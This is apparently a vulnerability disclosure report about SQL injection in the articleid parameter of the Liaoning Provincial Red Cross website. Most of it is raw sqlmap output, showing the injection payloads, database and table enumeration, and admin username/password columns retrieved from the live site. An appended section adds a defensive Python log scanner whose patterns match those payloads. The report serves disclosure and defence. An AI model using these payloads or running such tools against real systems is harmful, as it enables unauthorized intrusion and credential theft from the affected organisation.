2014-10-21: Details submitted to the vendor and awaiting vendor handling
2014-10-25: Vendor has confirmed; details disclosed to the vendor only
2014-11-04: Details disclosed to core white hats and experts in the relevant field
2014-11-14: Details disclosed to regular white hats
2014-11-24: Details disclosed to intern white hats
2014-12-05: Details disclosed to the public

SQL injection vulnerability on the official website of the Liaoning Provincial Red Cross Society (and, while I'm at it, asking for an invitation code)

www.lnredcross.org.cn/web/content.asp?id=46&articleid=1006
The injectable parameter is articleid; I just ran the tool against it directly.
sqlmap identified the following injection points with a total of 19 HTTP(s) requests:
---
Place: GET
Parameter: articleid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 9983=9983

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[14:56:14] [INFO] testing Microsoft SQL Server
[14:56:14] [INFO] confirming Microsoft SQL Server
[14:56:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[14:56:15] [INFO] fetching database names
[14:56:16] [INFO] the SQL query used returns 9 entries
available databases [9]:
[*] hongshiziyimai
[*] jijinhui
[*] lnredcross
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb

[15:01:12] [INFO] fetching tables for database 'lnredcross'
[15:01:21] [INFO] the SQL query used returns 35 entries
Database: lnredcross
[35 tables]
+--------------------+
| dbo.D99_Tmp        |
| dbo.NC_Account     |
| dbo.NC_Adboard     |
| dbo.NC_AddMoney    |
| dbo.NC_Adlist      |
| dbo.NC_Admin       |
| dbo.NC_Announce    |
| dbo.NC_Article     |
| dbo.NC_Card        |
| dbo.NC_Channel     |
| dbo.NC_Classify    |
| dbo.NC_Comment     |
| dbo.NC_Config      |
| dbo.NC_Confirm     |
| dbo.NC_DownAddress |
| dbo.NC_DownServer  |
| dbo.NC_Favorite    |
| dbo.NC_FlashList   |
| dbo.NC_Friend      |
| dbo.NC_GuestBook   |
| dbo.NC_GuestReply  |
| dbo.NC_Link        |
| dbo.NC_Message     |
| dbo.NC_Online      |
| dbo.NC_Paymode     |
| dbo.NC_ScriptFile  |
| dbo.NC_SoftList    |
| dbo.NC_Special     |
| dbo.NC_Template    |
| dbo.NC_User        |
| dbo.NC_UserGroup   |
| dbo.NC_Vote        |
| dbo.dtproperties   |
| dbo.sysconstraints |
| dbo.syssegments    |
+--------------------+

[15:05:00] [INFO] fetching columns for table 'dbo.NC_Admin' on database 'lnredcross'
[15:05:01] [INFO] the SQL query used returns 11 entries
Database: lnredcross
Table: dbo.NC_Admin
[11 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| Adminflag    | int      |
| AdminGrade   | int      |
| id           | int      |
| isAloneLogin | nvarchar |
| isLock       | nvarchar |
| Loginip      | nvarchar |
| LoginTime    | nvarchar |
| password     | nvarchar |
| RandomCode   | nvarchar |
| status       | nvarchar |
| username     | nvarchar |
+--------------+----------+

[15:06:59] [INFO] fetching columns 'username, password' entries for table 'dbo.NC_Admin' on database 'lnredcross'
[15:06:59] [INFO] retrieved: 13
[15:06:59] [INFO] fetching number of distinct values for column 'username'
[15:07:00] [INFO] retrieved: 13
[15:07:00] [INFO] using column 'username' as a pivot for retrieving row data
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] N
Database: lnredcross
Table: dbo.NC_Admin
[13 entries]
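As an added example that is not part of the original report: a small Python scanner that runs over constructed IIS W3C log lines (not the site's real logs) for content.asp, flags the two payload shapes sqlmap reported against articleid above (the AND n=n tautology and the CONVERT(INT, ...) error-based probe built from CHAR() calls), and applies the strict integer check that the articleid parameter should have enforced in the first place. The log field layout, IPs and timestamps are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C sample lines (assumed layout):
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2014-10-21 14:56:14 10.0.0.5 GET /web/content.asp id=46&articleid=1006 80 - 192.0.2.10 sqlmap/1.0 200
2014-10-21 14:56:14 10.0.0.5 GET /web/content.asp id=46&articleid=1006+AND+9983=9983 80 - 192.0.2.10 sqlmap/1.0 200
2014-10-21 14:56:15 10.0.0.5 GET /web/content.asp id=46&articleid=1006+AND+8171=CONVERT(INT,(CHAR(58)%2BCHAR(105)%2BCHAR(107)%2BCHAR(104)%2BCHAR(58)%2B(SELECT+(CASE+WHEN+(8171=8171)+THEN+CHAR(49)+ELSE+CHAR(48)+END))%2BCHAR(58))) 80 - 192.0.2.10 sqlmap/1.0 500
2014-10-21 14:57:01 10.0.0.5 GET /web/content.asp id=46&articleid=1007 80 - 198.51.100.7 Mozilla/5.0 200
"""

# The two techniques from the sqlmap output: a boolean tautology (AND n=n) and an
# error-based CONVERT(INT, ...) probe whose marker string is assembled with CHAR()+CHAR().
TAUTOLOGY = re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)
ERROR_BASED = re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)
CHAR_CONCAT = re.compile(r"\bCHAR\s*\(\s*\d+\s*\)\s*\+", re.I)


def is_valid_id(value: str) -> bool:
    """The check the fix needs: an article id is a plain integer and nothing else."""
    return re.fullmatch(r"\d{1,9}", value) is not None


def classify_query(raw_query: str) -> tuple[list[str], bool]:
    """Return (injection indicators found, whether every *id parameter is a clean integer)."""
    hits, clean = [], True
    # parse_qs decodes %2B -> '+' and '+' -> ' ', so we inspect what the ASP page would see.
    for name, values in parse_qs(raw_query, keep_blank_values=True).items():
        for v in values:
            if TAUTOLOGY.search(v):
                hits.append(f"{name}: boolean tautology")
            if ERROR_BASED.search(v):
                hits.append(f"{name}: CONVERT(INT) error-based probe")
            if CHAR_CONCAT.search(v):
                hits.append(f"{name}: CHAR() string building")
            if name.lower().endswith("id") and not is_valid_id(v):
                clean = False
    return hits, clean


def scan_log(text: str) -> list[dict]:
    """Report every request whose query carries an indicator or a non-integer id."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 11:
            continue
        hits, clean = classify_query(parts[5])
        if hits or not clean:
            findings.append({"time": parts[1], "client": parts[8], "uri": parts[4],
                             "status": parts[10], "hits": hits, "clean_ids": clean})
    return findings
```

The integer check alone would have rejected both probe requests before any SQL was built; the indicator patterns are only there to find such attempts in historical logs.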
Strengthen the input filtering.

Severity: High
Vulnerability Rank: 10
Confirmed at: 2014-10-25 23:44
Vendor response: none yet